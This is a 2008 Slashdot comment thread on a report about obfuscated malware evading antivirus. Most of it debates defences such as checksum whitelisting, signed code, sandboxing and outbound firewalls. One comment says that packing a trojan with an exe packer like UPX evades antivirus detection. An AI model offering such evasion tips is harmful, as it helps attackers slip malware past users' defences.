
Stealing Data With Obfuscated Code 101

Posted by Soulskill
from the malware-arms-race dept.
Weblver1 writes "A recent report by web security firm Finjan shows how easily data can be accessed on PCs by malware that circumvents existing defenses. With the use of obfuscated code, antivirus software and static Web filters could not identify the scrambled attack code as a threat. The report walks through a real-life infection scenario step-by-step, and tracks what happens to the stolen data. This demonstrates how stealing sensitive data has become unbearably easy, especially given the abundance of easy-to-use DIY crimeware toolkits. Finjan's report is available here (PDF, registration required). Shortly after this report, security firm RSA released its findings on a huge trove of stolen 'virtual wallets,' one of the largest discoveries of data stolen from computers compromised by the Sinowal trojan. While the trojan can be traced back to 2006, it has grown more productive over time through frequent variants. Given the scale, the ease of use, and hiding techniques that make infections extremely difficult to find, it's no wonder today's crimeware achieves such 'impressive' results."
  • Obfuscation 101 (Score:5, Interesting)

    by kbrasee (1379057) on Saturday November 01, 2008 @12:30PM (#25595483) Homepage
    X=1024; Y=768; A=3;

    J=0;K=-10;L=-7;M=1296;N=36;O=255;P=9;_=1<<15;E;S;C;D;F(b){E="1""111886:6:??AAF"
    "FHHMMOO55557799@@>>>BBBGGIIKK"[b]-64;C="C@=::C@@==@=:C@=:C@=:C5""31/513/5131/"
    "31/531/53"[b ]-64;S=b<22?9:0;D=2;}I(x,Y,X){Y?(X^=Y,X*X>x?(X^=Y):0,  I (x,Y/2,X
    )):(E=X);      }H(x){I(x,    _,0);}p;q(        c,x,y,z,k,l,m,a,          b){F(c
    );x-=E*M     ;y-=S*M           ;z-=C*M         ;b=x*       x/M+         y*y/M+z
    *z/M-D*D    *M;a=-x              *k/M     -y*l/M-z        *m/M;    p=((b=a*a/M-
    b)>=0?(I    (b*M,_      ,0),b    =E,      a+(a>b      ?-b:b)):     -1.0);}Z;W;o
    (c,x,y,     z,k,l,    m,a){Z=!    c?      -1:Z;c     <44?(q(c,x         ,y,z,k,
    l,m,0,0     ),(p>      0&&c!=     a&&        (p<W         ||Z<0)          )?(W=
    p,Z=c):     0,o(c+         1,    x,y,z,        k,l,          m,a)):0     ;}Q;T;
    U;u;v;w    ;n(e,f,g,            h,i,j,d,a,    b,V){o(0      ,e,f,g,h,i,j,a);d>0
    &&Z>=0? (e+=h*W/M,f+=i*W/M,g+=j*W/M,F(Z),u=e-E*M,v=f-S*M,w=g-C*M,b=(-2*u-2*v+w)
    /3,H(u*u+v*v+w*w),b/=D,b*=b,b*=200,b/=(M*M),V=Z,E!=0?(u=-u*M/E,v=-v*M/E,w=-w*M/
    E):0,E=(h*u+i*v+j*w)/M,h-=u*E/(M/2),i-=v*E/(M/2),j-=w*E/(M/2),n(e,f,g,h,i,j,d-1
    ,Z,0,0),Q/=2,T/=2,       U/=2,V=V<22?7:  (V<30?1:(V<38?2:(V<44?4:(V==44?6:3))))
    ,Q+=V&1?b:0,T                +=V&2?b        :0,U+=V    &4?b:0)     :(d==P?(g+=2
    ,j=g>0?g/8:g/     20):0,j    >0?(U=     j    *j/M,Q      =255-    250*U/M,T=255
    -150*U/M,U=255    -100    *U/M):(U    =j*j     /M,U<M           /5?(Q=255-210*U
    /M,T=255-435*U           /M,U=255    -720*      U/M):(U       -=M/5,Q=213-110*U
    /M,T=168-113*U    /       M,U=111               -85*U/M)      ),d!=P?(Q/=2,T/=2
    ,U/=2):0);Q=Q<    0?0:      Q>O?     O:          Q;T=T<0?    0:T>O?O:T;U=U<0?0:
    U>O?O:U;}R;G;B    ;t(x,y     ,a,    b){n(M*J+M    *40*(A*x   +a)/X/A-M*20,M*K,M
    *L-M*30*(A*y+b)/Y/A+M*15,0,M,0,P,  -1,0,0);R+=Q    ;G+=T;B   +=U;++a<A?t(x,y,a,
    b):(++b<A?t(x,y,0,b):0);}r(x,y){R=G=B=0;t(x,y,0,0);x<X?(printf("%c%c%c",R/A/A,G
    /A/A,B/A/A),r(x+1,y)):0;}s(y){r(0,--y?s(y),y:y);}main(){printf("P6\n%i %i\n255"
    "\n",X,Y);s(Y);}
    • by peektwice (726616)
      That's funny. The Perl Journal had those obfuscated contests too. Here was my lone attempt:
      #!/usr/bin/perl
      for(unpack('C*',pack "H*",unpack "u", "B,\&\$V8S8Q-F4W,C>U-F8T83\(P-F,W,C8U-3\`R,#8U-C\@U-\`\`\`")){unshift @^O,$_};foreach $_(@^O){print pack('c*',$_)};print " \n";
    • by fyrewulff (702920) on Saturday November 01, 2008 @02:44PM (#25596467)
      Drink.... more.... Ovaltine?!?
      • by mrmeval (662166)

        NO! http://www.schlockmercenary.com/d/20010225.html [schlockmercenary.com]

        Imitation Ovalkwik!

        Glucose, fructose, corn syrup solids, concentrated cocoa-bean extract, assorted methylxanthine alkaloids (including caffeine, theobromine, and theophylline), sodium laureth sulfate, Minoxadyl, buckminster fullerene, codeine, hyper-ephedrine, nicotine, with BHA and BHT added to preserve freshness.

  • by liquidpele (663430) on Saturday November 01, 2008 @12:34PM (#25595513) Journal
Once it has the potential to run on your system, you're basically already screwed. Antivirus companies help a little by catching the known worms and viruses that have been around for a while, but in return usually slow the system down as well. As always, the only thing you can do is keep your software updated, don't run programs or code you don't trust, don't let people on your system that you don't trust to keep the system clean, and hope for the best.
    • by khasim (1285) <brandioch.conner@gmail.com> on Saturday November 01, 2008 @12:42PM (#25595553)

      http://www.ranum.com/security/computer_security/editorials/dumb/index.html [ranum.com]

      Why bother with anti-virus for the system itself? (Note: anti-virus is acceptable for mail servers or file servers.)

      Instead, why not focus on identifying the known good code ... and quarantining anything else?

      Maybe there aren't an infinite number of ways to obfuscate code (eventually your obfuscation would exceed the capacity of the local hard drive) but there are FAR more ways to obfuscate code so it bypasses the anti-virus scanners than there are bits of known good code.

      I should be able to boot from some form of rescue CD with a HUGE list of filenames, checksums, etc ... and what application they are associated with ... and validate every single file on a workstation. And then quarantine everything else so it can be manually verified.

      There, even if you get infected, the disinfection is simple AND effective.
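A minimal sketch of that audit pass, assuming a pre-built manifest mapping file paths to known-good SHA-256 checksums (the function names and manifest format here are hypothetical, not any particular rescue CD's):

```python
import hashlib
import os

def sha256_of(path, bufsize=1 << 16):
    """Hash a file in chunks so large binaries don't exhaust memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(bufsize), b""):
            h.update(chunk)
    return h.hexdigest()

def audit(root, manifest):
    """Walk `root`; return files whose hash is unknown or wrong.

    `manifest` maps absolute paths to known-good SHA-256 digests,
    e.g. as shipped on read-only rescue media.
    """
    suspect = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if manifest.get(path) != sha256_of(path):
                suspect.append(path)  # quarantine candidate
    return suspect
```

Anything audit() returns would go on the quarantine list for manual review. The manifest itself has to live on read-only media, or it becomes just another file malware can edit.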

      • Re: (Score:3, Interesting)

        by postbigbang (761081)

        To answer your question:

        Because you'll be p0wn3d in no time. Trust what? AV libraries are mostly behind the times and can't smell subtle variations. They suck, generally. Test after test shows just how bad they are.

        There doesn't have to be an infinite number of obfuscations. Just one will do. That's why trusting any code can be simply stupid. Anything can get infected, there are tons of vectors.

        Getting disinfected doesn't necessarily work, either. Usually the initial infection vector still exists (the hapless user).

        • That's what I said. (Score:5, Informative)

          by khasim (1285) <brandioch.conner@gmail.com> on Saturday November 01, 2008 @01:41PM (#25595995)

          Because you'll be p0wn3d in no time. Trust what? AV libraries are mostly behind the times and can't smell subtle variations.

          That's what I said. While there isn't an infinite number of variations, there are far more variations possible than there are known good bits.

          So do NOT try to solve this problem by matching "bad" patterns.

          Match known good patterns and quarantine everything else.

          Getting disinfected doesn't necessarily work, either. Usually the initial infection vector still exists (the hapless user).

          The user will ALWAYS be the weakest link. As the article I linked to stated, if education could work, it would have worked by now.

          Instead, focus on building systems that MINIMIZE the vulnerability and that make it EASY to RECOVER when it is cracked.

          Quarantining code is folly.

          That's your opinion. I can show that it does work.

          Active and varied defenses and re-writes and restores to RO media help.

          Huh? How about some specifics? Because that isn't making sense to me.

          I scrape so much crap from friends' and relatives' machines that I've got BartsCD built for most of them. I just re-write the registry after active scans, and re-write the kernel, vmm, and browser crap.

          How do you "re-write the registry"?

          Instead, imagine an anti-virus system that refuses to allow code to be installed in the system directories (or registered) unless it matches the checksums, names, etc. on a list of known good apps. Then it just becomes an issue of keeping that list updated with the latest patches and upgrades.

          Instead of downloading the daily list of suspected BAD patterns, you'd be downloading a list of known good patterns. And that would only need to be updated prior to something being installed on the system.

          For a business looking to manage thousands of PC's ... all with the same basic apps and patch levels and such ... this would be so much easier than trying to maintain the current anti-virus system (engine upgrades, signature upgrades). Nothing would be installed that was not pre-approved by their department.
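A toy version of that install gate, assuming the IT department publishes a whitelist mapping approved file names to their approved SHA-256 digests (all names here are made up for illustration):

```python
import hashlib

def install_allowed(filename, payload, approved):
    """Permit an install only if this exact file name is pre-approved
    AND the payload's SHA-256 matches one of the approved digests."""
    digest = hashlib.sha256(payload).hexdigest()
    return digest in approved.get(filename, set())
```

A tampered binary keeps its name but not its digest, so it fails the gate; shipping an update means publishing a new digest, not waiting for a new scanner signature.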

          • Re: (Score:2, Insightful)

            Match known good patterns and quarantine everything else.

            That's fine in a business environment where you have a floor of users all running an Office Suite of programs.

            In any other setting it stifles innovation. Which is fine, if you work for a big company operated by stuffed suits.

            White lists are an excellent opportunity for the people and organizations not afflicted with an IT staff who would impose them.

            But, then, 'IT' is just the new word for file clerk. Keep those files all neat and in order, clerks.

            • by Locklin (1074657)

              It could still work, on Linux. Suppose you had a program that checks the md5 of every executable file and library on the system against the distro's repository, then creates a list of the remaining files to be confirmed manually. People writing software could simply manually mark their own software, or non-packaged software, as needed.

              • The problem with open source is simple: authors don't bother, which makes their apps vulnerable in transmission, and the source itself can be infected.

                Of course, really providing unbreakable process isolation is evil (drm-enforcement, palladium, microsoft)

                Redhat, btw, does do this, but nobody really bothers to check their installation.

                And as for the anti-virus companies, every virus author runs all the antivirus tools against his new creation (obviously).

              • by tepples (727027)

                People writing software could simply manually mark their own software, or non-packaged software as needed.

                So how would malware not mark itself in the same way?

                • by RockDoctor (15477)

                  People writing software could simply manually mark their own software, or non-packaged software as needed.

                  So how would malware not mark itself in the same way?

                   The "mark" would need to be made using something like a public-key signature system. The signature contains the path of the OK'd file, its MDx hash (it doesn't particularly matter which hash you choose), and the public key ID of the person who says it's OK; then sign it with that person's private key. The "OK" mark should be trivial to check then.
                  In add
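A rough sketch of that mark, with one big substitution: Python's standard library has no public-key primitives, so an HMAC over the record stands in for the real signature (a deployment would use something like Ed25519, where the verifier holds only the public key). All names here are illustrative:

```python
import hashlib
import hmac

def make_mark(path, content, key, signer_id):
    """Build the 'OK' mark: path, content hash, and who vouched,
    bound together by a MAC (a public-key signature in a real system)."""
    digest = hashlib.sha256(content).hexdigest()
    record = f"{path}|{digest}|{signer_id}".encode()
    tag = hmac.new(key, record, hashlib.sha256).hexdigest()
    return {"path": path, "sha256": digest, "signer": signer_id, "tag": tag}

def check_mark(mark, content, key):
    """Recompute and compare; any change to path, bytes, or signer fails."""
    record = f"{mark['path']}|{mark['sha256']}|{mark['signer']}".encode()
    ok_tag = hmac.compare_digest(
        hmac.new(key, record, hashlib.sha256).hexdigest(), mark["tag"])
    ok_hash = hashlib.sha256(content).hexdigest() == mark["sha256"]
    return ok_tag and ok_hash
```

Because the path and signer ID are inside the signed record, a mark can't be transplanted onto a different file or re-attributed to a different vouching person.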

                  • The "mark" would need to be made using something like a public-key signature system. [...] In addition, since you're talking about someone's within-company ID

                    The system you describe is very similar to the existing Authenticode system, with the company as the root CA. It would work within a sufficiently large company, which applies something like Windows group policy across a domain. But do you know any way this system could be extended to a home or home office environment? Adware and surveillanceware published by large companies routinely gets signed, and legitimate free software maintained by amateurs remains unsigned because the extra $200 per year to keep the

                    • by RockDoctor (15477)

                      The system you describe is very similar to the existing Authenticode system, with the company as the root CA.

                      I'll take your word for it. "Authenticode" rings a (faint) bell.

                      It would work within a sufficiently large company, which applies something like Windows group policy across a domain.

                      I'll take your word for it. I remember trying to get my head around the difference between a domain and a subnetwork yonks ago, and failing. It seems to be an incoherent mess - every company implementing different things d

                    • by tepples (727027)

                      I don't know what you mean by "home" or "home office" environment - at least in some way that differentiates it from any other office environment.

                      A home environment has no dedicated IT personnel to try new programs in a sandbox to determine that they're not likely to misbehave in production. That's why some Slashdot users have proposed [slashdot.org] installing every application into a separate sandbox, but then that would involve work on Microsoft's part to add support in the system libraries and the Windows user interface for managing sandboxes.

                      I've got better uses for the money. But then, I don't make my living by writing software. [...] Is $200 more than you're willing to pay as part of the cost of being in that business?

                      As you started to recognize, not everybody who develops software does it as a business. Some are employed in other field

                    • by RockDoctor (15477)

                      If you get your pet free software project picked up by a company or a software foundation, signing software for public use is well worth it. Otherwise, $100 to $200 per supported platform per year can make it a really expensive hobby.

                      You need a different signature key for each platform?? Weird. And probably unhealthy.

                    • by tepples (727027)

                      You need a different signature key for each platform??

                      Yes. Authenticode certificates work only on Windows. iPhone SDK certificates work only on iPhone. XNA Creators Club certificates work only on Xbox 360.

                    • by RockDoctor (15477)
                      This bloody "new" discussion system seems to have lost my previous reply. What I want to know is, what did I do to get it turned on, so I can avoid doing that in future?

                      Do you know of a cross-platform code authentication system? You seem to have some sort of professional stake in code development.

                      I would guess that the only way such could work would be to distribute a package of pre-compiled binaries, separated into chunks (libraries) which are processor-specific versus processor-agnostic, together with lin

            • I am a developer - I run my compiler, it generates an EXE - it gets quarantined...

              It simply is not practical in a "real world" situation except on a locked-down, one-task PC.

              A firewall, the latest updates, and a user who cannot easily install/run new programs is far more secure (not perfect, but more reliable).

              I would like to know how the PC was infected: this is the only interesting bit. What happens after is largely irrelevant; once a PC can be persuaded to run arbitrary code, the payload can be anything.

          • Web 2.0 RIP (Score:3, Interesting)

            by PPH (736903)

            That will kill Web 2.0 technologies, or anything where content/service providers expect you to run their code on your system. None of the schemes for whitelisting, signed certificates, checksums, etc. can handle the sheer volume of apps that these new services expect you to handle. They work well for manually downloaded and installed applications and packages, but not when every kid with a FaceBook page has a game or other cute widget they want you to download.

            The sheer volume of web apps of this type will

            • by Wildclaw (15718)

              It is perfectly possible to run programs that aren't trusted. You just can't allow them to do certain things. This is the main principle of sandboxing, and a good operating system should sandbox every single application completely, unless someone with administrator privileges requests otherwise. And even such requests should only be exceptions to the sandboxing.

              I am running every program I don't trust sandboxed with sandboxie [sandboxie.com]. It isn't a perfect solution as it isn't as well integrated into the system as it c

              • by PPH (736903)

                unless someone with administrator privileges requests otherwise.

                Which, for most PCs, happens to be the user, Joe Sixpack. To whom, most UAC popups look like:

                Blah, blah blah blah. Blah access blah blah blah. Blah.
                [Cancel] or [Allow]

                All Joe Sixpack cares about is which button will make the nasty box go away the fastest.

                • by Wildclaw (15718)

                  True. But you can never protect idiots. It is doomed from the start.

                   However, modern operating systems fail to even protect people who aren't stupid. It is way too easy to get malware installed on a machine, and far too difficult to remove it.

          • Re: (Score:3, Interesting)

            by postbigbang (761081)

            It's possible to write a known good kernel and a matching set of registry hives (the whole thing can be dangerous) along with vmm, hiberfile and so on to DVD. Using BartsCD, one boots XP, does the restoration, and easily moves on.

            There's a certain amount of sense in trying to protect groups of users, in business environments, and so on. An individual will be eventually cracked somehow on Windows. It's tougher to do on Linux, and still tougher on MacOS and xBSD and OpenSolaris.

            Still, I watch everyone ignore

            • It's tougher to do on Linux, and still tougher on MacOS and xBSD and OpenSolaris.

              How so? Security is really very much the same between Linux and any other Unix-like OS.
      • by sakonofie (979872)

        validate every single file on a workstation.

        The problem with a white list is that in order for it to be effective it can't have too many false negatives. Having the white list validation program go apeshit over every file that isn't on it isn't all that helpful. I don't really want to have to hit ignore for every file in /home and most of my configuration files. (To get around this you could just update the white list, but that would have to be done every time a file is edited, which is too frequent; so what is the right frequency, etc.)
        Also whit

      • by bit01 (644603) on Saturday November 01, 2008 @01:42PM (#25596001)

        Yes. To verify a system is uncompromised from a possibly compromised system is idiotic. If a person doesn't understand this then they are not a competent programmer.

        I've said for years that most "anti-virus" companies are engaged in fraud and the CEO's of most "anti-virus" companies should've been in jail for it a long time ago. It shows how low the IT industry has sunk when even quite basic fraud like this is being allowed to continue. At the very least there should have been a class-action lawsuit.

        The only way to truly verify a system is good is to do it from a known good system. For a standalone PC that means booting off known-good read-only media, usually a CDROM, and using that to verify the checksums of all the critical files on the hard disk. To handle updates the CDROM needs to have enough smarts to download signed checksums of updates off the net and store them in encrypted form (so malware can't tamper with them) on read-write media, preferably a memory key only inserted into the system when booted off the read-only media.

        Part of the reason this has not been done until now is that third parties could not easily read the proprietary, undocumented NTFS file system, that BS OS licensing made it difficult and expensive to have a separate boot, and that M$, incredibly, stopped shipping CDROMs of their OS. Now that NTFS has been reverse engineered it is possible to create a third-party Linux CDROM that can do all of the above. This is the only practical way to stop the Windows virus pandemic. Ironic that the best way to verify a Windows system may be to use a Linux system.

        To anticipate a few questions:

        • Yes, Joe Sixpack is perfectly capable of inserting a CDROM, pressing the reset key and following the limited instructions (ie. get professional help if a virus is found or recover files off the known good distribution media).
        • Yes, this approach is perfectly capable of protecting Joe Sixpack's personal files if the CDROM has enough smarts to back up personal files and checksum them every time it is run. Even if it doesn't do this, it's still verifying the system is uncompromised.
        • Yes, it's perfectly capable of verifying every executable on the system, including those not initially distributed with the OS.
        • Yes, both whitelist and blacklist checksumming is possible at the same time. What a concept!
        • Good system/network administrators already automatically and regularly checksum-verify all the systems they manage, to confirm their systems have not been corrupted, whether by a virus or a hardware error. It works. If they don't, they are mediocre administrators at best.

        M$ is perfectly capable of creating such a CDROM; however, those "professionals" have chosen not to, and allow the virus/bot pandemic to continue. And they wonder why some people don't like them.

        ---

        Ownership, by definition, is the right to control something. Any ethical (not legal) argument based on "because they own it" is bogus.

        • by Angostura (703910)

          Yes, it's perfectly capable of verifying every executable on the system, including those not initially distributed with the OS.

          I'm very very sceptical of this claim. But I'm willing to wait and hear your methodology.

        • by rew (6140)

          The only way to truly verify a system is good is to do it from a known good system. For a standalone PC that means booting off known-good read-only media, usually a CDROM,
          Here you have a slight problem with implementing your suggestion: The CPU boots off the read-write flash chips on the motherboard, not off the CDROM.

      • If you update executable files or libraries, you'd have to re-whitelist them. That means you essentially have to turn off the whitelist, update, and then tell the whitelist to baseline to the new system. While ideally that would work, it puts a lot of responsibility on the user which won't work out so well.

        For Linux, it could be easier, though, since you could combine doing that with the package software (apt/yum/whatever); but because software on Windows all updates differently, it would be a nightmare.
      • Problem being that there is no such thing as known good code. Even if you saw all of the source code and compiled it yourself, there is always the possibility that the compiler or linker/loader introduced a back door (this problem has been known for a long time). The best you could say is that certain code is trusted. On the other hand, there is such a thing as known bad code.
        • by walshy007 (906710)

          there is always the possibility that the compiler or linker/loader introduced a back door

          Problem being that there is no such thing as known good code.

           I disagree. You can use gdb to step through the compiled binary and watch what it does, but since it is not yet trusted, even then do it in a VM. Same thing with disassemblers. If I've scoured through all of the assembly and still find nothing, I'd say it's known good code, though I wouldn't say the same for the libraries it calls until they are inspected also. You would want it to be a very special program to justify that kind of work, though.

          • by idontgno (624372)

            Don't forget, too, that the toolchain you're using to do your diagnostics can be the source of the hack.

            ...You can't trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. In demonstrating the possibility of this kind of attack, I picked on the C compiler. I could have picked on any program-handling program such as an assembler, a loader, or even hardware

        • by bhtooefr (649901)

          What if you wrote the compiler yourself, in assembly?

          Then, the exploits would only be at the BIOS or hardware level...

      • If you add "why not quarantine everything" you're at what Microsoft is trying to do with Palladium.

        Obviously one of the first side-effects is simple: that quarantine, unoverridable (which is what security researchers want), is exactly what you need to implement "real" DRM.

    • by Jessta (666101)

      Nothing can protect you?
      how about not running code that is malicious?

      I've always found the concept of 'computer security' fairly strange. It's your computer, you control what runs on it...
      why are people running code that acts counter to their interests?
      why are operating systems designed in such a way that a user can have no idea what a program is going to do?

      Seems kind of insane to me.

      • You serious? "Just don't run code that is malicious" is a ridiculous argument. What if it's a shareware program they get that's been tainted to also install a trojan? What if it's a worm making use of a 0-day vuln and they don't even have to manually run anything? Computers are just more complicated than that, sorry.
        • Re: (Score:3, Funny)

          by Jessta (666101)

          In fact you are wrong.
          Computers aren't as complicated as that.
          It's easy enough to design a system that makes obscuring the purpose of a piece of code impossible, and then have all programs define a contract with the system as to what resources they need to use. This information is conveyed to the user in a nice way, and now the user will know straight away whether a program is going to act maliciously before they run it.
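The contract idea can be sketched as a loader-side check; the resource-name strings below are invented purely for illustration:

```python
def violations(declared, user_approved):
    """Resources the program's contract asks for that the user never
    granted; anything listed here is surfaced before the program runs."""
    return sorted(set(declared) - set(user_approved))

def may_run(declared, user_approved):
    """The loader starts the program only if its contract is fully covered."""
    return not violations(declared, user_approved)
```

Enforcement is the hard part, of course: the system still has to guarantee that a running program cannot reach anything outside its declared contract.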

          0-day arbitrary code execution vulnerabilities are created due to a small set of thin

          • Re: (Score:3, Informative)

            by liquidpele (663430)
            Wow... your ignorance on the subject is quite funny.
          • There should be a contest of obfuscated English! I would vote for your post! Kudos
          • It's easy enough to design a system to make obscuring the purpose of a piece of code impossible

            Given: The purpose of a piece of code is either to halt or to loop. Deciding even this has been proven impossible [wikipedia.org].

            and then have all programs define a contract with the system as to what resources they need to use on the system

            In other words, you're recommending sandboxing. That is a solved problem on OLPC [laptop.org] and on FreeBSD [wikipedia.org], but as far as I can see, no such software for creating and managing sandboxes comes with home editions of the Windows operating system.

            • by Jessta (666101)

              Given: The purpose of a piece of code is either to halt or to loop. Deciding even this has been proven impossible [wikipedia.org].

              This is only an issue for a Turing-complete machine; by limiting what a program can do, you can avoid this problem.

              The relevant part of a possibly malicious program, to a user or admin, is how it interacts with the rest of the system, because whatever it's doing is mostly irrelevant until it outputs to somewhere. This is very easy to notice and impossible to obscure, as all of this interaction goes through calls to system libraries

              and then have all programs define a contract with the system as to what resources they need to use on the system

              In other words, you're recommending sandboxing....I can see, no such software for creating and managing sandboxes comes with home editions of the Windows operating system.

              I wasn't actually recommending sandboxing, I was recommending language based system security (singularity, inferno etc).

              • by tepples (727027)

                The relevant parts of a possibly malicious program to a user or admin is how it interacts with the rest of the system. Because what ever it's doing is mostly irrelevant until it's outputting it to somewhere.

                And sandboxes are designed to control how a program interacts with the rest of the system.

                I was recommending language based system security(singularity, inferno etc).

                Most languages still can't parse string arguments deeply enough to distinguish open() in the user's home directory from open() elsewhere. That's the responsibility of runtime security such as ACLs or capabilities, and sandboxing is just a finer-grained way to assign capabilities than the traditional user/group model.

                Why even run untrustworthy code?

                Because the major vendors of computer hardware for use in a home environment have declined to provide a convenient way to mark code developed by an amateur programmer as trustworthy.

                • by Jessta (666101)

                  And sandboxes are designed to control how a program interacts with the rest of the system.

                  Sandboxing is usually about controlling an untrusted program and denying it access to requested resources it's not authorised to access. I'd prefer a program was trusted and didn't make requests for access to unauthorised resources.

                  Most languages still can't parse string arguments deeply enough to distinguish open() in the user's home directory from open() elsewhere...

                  Yeah, so you don't even include open() in the standard lib of the language, so the programmer can't even make the request. Then you create a different syscall that's more restricted. Similar to how the Bitfrost #P_DOCUMENT [laptop.org] section handles it.
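A sketch of such a restricted file call in the Bitfrost spirit: instead of exposing open() directly, the runtime hands each program a path-confined substitute (the sandbox layout here is hypothetical):

```python
import os

def make_restricted_open(sandbox_root):
    """Return an open() substitute that refuses any path escaping
    `sandbox_root`, including '..' tricks and symlink hops."""
    root = os.path.realpath(sandbox_root)
    def sandboxed_open(path, mode="r", **kwargs):
        real = os.path.realpath(os.path.join(root, path))
        if os.path.commonpath([root, real]) != root:
            raise PermissionError(f"{path!r} escapes the sandbox")
        return open(real, mode, **kwargs)
    return sandboxed_open
```

The program never sees a raw open(); it can only ask for files relative to its own directory, so "can this code read my documents?" is answered by construction rather than by scanning.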

                  Why even run untrustworthy code?

                  Because the major vendors of computer hardware for use in a home environment have declined to provide a convenient way to mark code developed by an amateur programmer as trustworthy.

                  This doesn't require hardware support(

    • by jesterzog (189797)

      As always, the only thing you can do is keep your software updated, don't run programs or code you don't trust, don't let people on your system that you don't trust to keep the system clean, and hope for the best.

      I'd add regular backups of important data to that list.

  • by James_Duncan8181 (588316) on Saturday November 01, 2008 @12:34PM (#25595515) Homepage

    But when people say that we should have only one distro, and that it's a problem that different distros use different versions of software and insert their own patches...this is why they are wrong wrong wrong.

    Monocultures FTL.

    • Re: (Score:3, Informative)

      by CSMatt (1175471)

      Except that a lot of distributions are based on only a handful of larger distributions. Any bugs present in the parent distribution can surface in all of the others that are based on it. Debian's OpenSSL flaws are a good example.

    • The differences between Linux distros are big enough to annoy programmers with better things to do, but small enough that you can still write a virus that works on all of them if you want to. So it's actually the worst of all possible worlds.

  • by antifoidulus (807088) on Saturday November 01, 2008 @12:39PM (#25595537) Homepage Journal
    Surfin'Shield [cigital.com] sort of drowned. There is probably a similar scam behind this "research"....
  • Not a new solution, but effective in its day. It poses problems for today's dynamic content and programs, but if identifying alien code is the goal, programs such as Tripwire are a step in the right direction.
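The Tripwire approach can be sketched in a few lines of Python (a toy illustration of the idea, not Tripwire's actual database format): record cryptographic hashes of the files you care about, then periodically re-hash and compare.

```python
import hashlib

def snapshot(paths):
    """Record a SHA-256 baseline for a set of files."""
    baseline = {}
    for p in paths:
        with open(p, "rb") as f:
            baseline[p] = hashlib.sha256(f.read()).hexdigest()
    return baseline

def verify(baseline):
    """Return the files whose contents no longer match the baseline."""
    changed = []
    for path, digest in baseline.items():
        with open(path, "rb") as f:
            if hashlib.sha256(f.read()).hexdigest() != digest:
                changed.append(path)
    return changed
```

Alien code dropped into a monitored binary shows up as a changed digest; the weakness, as the comment notes, is anything that legitimately rewrites itself.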
  • I'm not sure if this is still the case, but back in the day using an exe packer (like upx [sourceforge.net]) on a trojan or virus would prevent detection by most anti-virus software, and as an added bonus the payload also becomes much smaller.
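Why packing defeated signature scanners is easy to demonstrate with a toy XOR "packer" (real packers like UPX also compress, which is where the size win comes from; the marker string here is made up):

```python
def xor_pack(payload: bytes, key: int = 0x5A) -> bytes:
    """Toy packer: XOR every byte, so static byte signatures no longer match.
    Applying it twice restores the original, since XOR is its own inverse."""
    return bytes(b ^ key for b in payload)

signature = b"EVIL_MARKER"                         # what a scanner might look for
payload = b"header " + signature + b" rest of body"
packed = xor_pack(payload)

assert signature in payload        # the scanner catches the raw payload
assert signature not in packed     # ...but not the packed copy on disk
assert xor_pack(packed) == payload # a small runtime stub unpacks it back
```

This is why modern scanners try to emulate or unpack samples before matching signatures, rather than scanning the raw file bytes alone.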
  • Will using only live CDs work? With a white list?

  • Everything Open Source + people collaboratively and systematically reviewing source code
  • Of course this doesn't really apply to web browser hijacks, but you can at least intercept a lot of your outgoing traffic. The problem is that most people just click the OK button willy-nilly because they want to see it go away.

    • Re: (Score:1, Flamebait)

      by Laebshade (643478)

      Outbound firewalls are for people who don't know what they're doing, or for those supporting users who don't know and who want to stop them from doing something.

      • by ShinmaWa (449201) on Saturday November 01, 2008 @02:23PM (#25596313)

        Outbound firewalls are for people who don't know what they're doing

        What an incredibly ignorant and stupid thing to say.

        I definitely know what I'm doing and I use my outbound firewall to its fullest extent. Having the ability to proactively determine what software can and can't touch the network, be it establishing a connection or binding to a port, in conjunction with a proper hardware solution provides not only good protection, but also serves as an early warning system when an unknown program attempts to go to an unknown site for an unknown reason.

        Granted, outbound firewalls are not perfect. If a whitelisted application is compromised, then this firewall doesn't provide much protection. This is why outbound firewalls should be but one of several items in your security toolbox.

        However, to wave your hand and claim they are only for people who don't know what they are doing shows a level of arrogance that usually gets corrected only after you are compromised.
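For concreteness, a default-deny outbound policy of the kind described above might look like this with iptables. This is a sketch under assumptions, not a complete ruleset: it assumes the owner match is available and that each network-facing program runs under its own account ("browser" here is a hypothetical username).

```shell
# Drop all outbound traffic unless explicitly whitelisted.
iptables -P OUTPUT DROP

# Loopback and replies to established connections are allowed.
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

# Only the dedicated 'browser' account may open HTTPS connections.
iptables -A OUTPUT -m owner --uid-owner browser -p tcp --dport 443 -j ACCEPT

# Everything else gets logged before the policy drops it --
# this is the "early warning system" in practice.
iptables -A OUTPUT -j LOG --log-prefix "blocked-out: "
```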

        • In short: he knows what he is doing, but what the computer is doing is quite a different matter.
  • For the truly paranoid, what are the best tools to run on your system to detect potential intrusion of this type?
  • if(isroot = 1){ (Score:3, Insightful)

    by davolfman (1245316) on Saturday November 01, 2008 @01:20PM (#25595843)
    Does this remind anyone else of the time someone tried to replace a conditional with an assignment and check it into the Linux kernel to create a triggerable security hole?
    • by Alex Belits (437) *

      No.

    • I don't think the infamous "isroot = 1" is an example of obfuscated code.

      It is actually quite straightforward. I didn't RTFA (but again, who does? ;-P ), but I guess the "obfuscated" malware is something like a just-in-time code spitter: the attack code is generated at runtime, on demand, in an obfuscated manner, bypassing common antivirus software. If the payload is not hard-coded, the malware can masquerade as an innocuous application more easily.

      Correct me if I'm wrong.
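The parent's guess can be illustrated in a few lines of Python (with a benign stand-in payload, of course): what sits on disk is only the scrambled blob plus a tiny loader, and the real code exists only in memory after decoding.

```python
import base64

# What "ships on disk": no readable strings, no recognisable code.
scrambled = base64.b64encode(b"result = 6 * 7")

def run_payload(blob):
    """Decode and execute at runtime. A static scanner never sees the
    decoded form, only this small, innocuous-looking loader."""
    namespace = {}
    exec(base64.b64decode(blob).decode(), namespace)
    return namespace["result"]

assert b"6 * 7" not in scrambled      # the plain code never appears on disk
assert run_payload(scrambled) == 42   # yet it runs fine once decoded
```

Real crimeware layers several rounds of this (and varies the encoding per victim), which is exactly what defeats signature-based filters.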

  • by Anonymous Coward

    I've heard about a project at CERT called function extraction that might be relevant to this. It's been going on for a few years and they've produced some tools. I don't know much more.

    http://www.cert.org/sse/function_extraction.html [cert.org]

